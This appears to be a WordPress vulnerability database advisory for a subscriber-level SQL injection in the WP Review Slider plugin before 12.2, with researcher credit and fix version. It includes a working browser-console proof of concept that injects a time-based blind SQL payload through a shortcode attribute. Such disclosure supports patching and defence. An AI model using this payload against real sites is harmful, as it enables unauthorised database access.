WordPress Plugin Vulnerabilities
WP Review Slider < 12.2 - Subscriber+ SQLi
Description
The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as subscriber.
Proof of Concept
Run the following code in the browser console on any WP Admin page.
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
headers: new Headers({
'Content-Type': 'application/x-www-form-urlencoded',
}),
body: 'action=parse-media-shortcode&shortcode=[wprevpro_usetemplate tid="1 AND (SELECT 42 FROM (SELECT(SLEEP(5)))b)"]'
}).then(response => response.text()).then(result => console.log(result)).catch(error => console.log('error', error)); Affects Plugins
Fixed in version 12.2
References
Classification
Miscellaneous
Original Researcher
Lana Codes
Submitter
Lana Codes
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2023-01-23 (about 8 months ago)
Added
2023-01-23 (about 8 months ago)
Last Updated
2023-01-23 (about 8 months ago)